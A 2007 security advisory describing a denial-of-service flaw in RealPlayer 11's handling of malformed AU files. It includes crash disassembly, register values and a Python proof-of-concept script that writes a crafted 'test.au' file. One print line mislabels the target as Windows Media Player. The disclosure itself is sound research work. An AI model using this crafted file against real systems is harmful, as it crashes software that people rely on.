realpdos_au.txt

`Type : DOS attack when processing a malformed AU file.  
Affected : Realplayer 11 ActiveX on Win Vista and Win XP SP2  
Date : 01-12-2007   
Author : Adonis, Abed safehack.com   
Link : http://www.safehack.com/Advisory/realpdos_au.txt   
  
  
Disclaimer  
----------  
The information in this text is believed to be true based on   
experiments though it may be false.  
This material is presented for informational purposes ONLY.  
We do not accept any liability for anything anyone does with this  
Information.  
  
Brief History  
-------------  
Link : http://www.safehack.com/Advisory/realpdos_au.txt  
RealPlayer 11 is prone to a denial-of-service vulnerability when  
processing a malformed AU file.  
  
A remote attacker can exploit this issue to crash the affected  
application, denying service to legitimate users.  
  
  
The Problem  
-----------  
Instructions: :  
:  
630A87D5 894E 76 MOV DWORD PTR DS:[ESI+76],ECX :  
630A87D8 1BDB SBB EBX,EBX :  
630A87DA 83E3 03 AND EBX,3 :  
630A87DD 83C3 08 ADD EBX,8 :  
630A87E0 0FAFFB IMUL EDI,EBX :  
630A87E3 D1E7 SHL EDI,1 :  
630A87E5 33D2 XOR EDX,EDX :  
630A87E7 F7F7 DIV EDI <- division by zero, crash :  
:  
:  
Registers: :  
:  
EAX 00000000  
ECX 00000000  
EDX 00000000  
EBX 0000000B  
ESP 07F5FE14  
EBP 07F5FE24  
ESI 01DE0E48  
EDI 00000000  
EIP 630A87E7 pnen3260.630A87E7  
  
  
Hex Dump:  
  
00411000 00 00 00 00 9C CF 40 00 ....œÏ@.  
00411008 90 D3 40 00 A0 D3 40 00 Ó@. Ó@.  
00411010 C0 D3 40 00 E0 D3 40 00 ÀÓ@.àÓ@.  
00411018 00 D4 40 00 10 D4 40 00 .Ô@.Ô@.  
00411020 00 00 00 00 00 00 00 00 ........  
00411028 00 00 00 00 00 00 00 00 ........  
  
  
-:P.O.C.:-  
+---------  
#RealPlayer 11 local/remote DoS by A.Sawan aka NtWaK0 and A.Hariri aka nophie  
  
import sys  
import os  
  
head =   
("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01"+  
"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E"+   
"\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22"+   
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+  
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+  
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+  
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+  
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+  
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+  
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+  
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+  
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+  
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+  
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+  
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+  
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+  
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+  
"\x00\x00\x00\x00\x00\x00\x00\x00\x66\x66\x66\x00")  
  
print "[x] Windows Media Player 11 DoS by Adonis a.K.a NtWaK0 and Abed aka Nophie."  
  
try:  
f = open("test.au",'w')  
except IOError, e:  
print "Unable to open file ", e  
sys.exit(0)  
  
print "[x] File sucessfully opened for writing."  
try:  
f.write(head)  
except IOError, e:  
print "Unable to write to file ", e  
sys.exit(0)  
print "[x] File successfully written."  
f.close()  
print "[x] Open test.au with RealPlayer 11."  
  
  
  
+-----------------------------------------------------------------.  
Peace to you all:all and Happy New Year full of health and Peace :  
+-----------------------------------------------------------------.  
`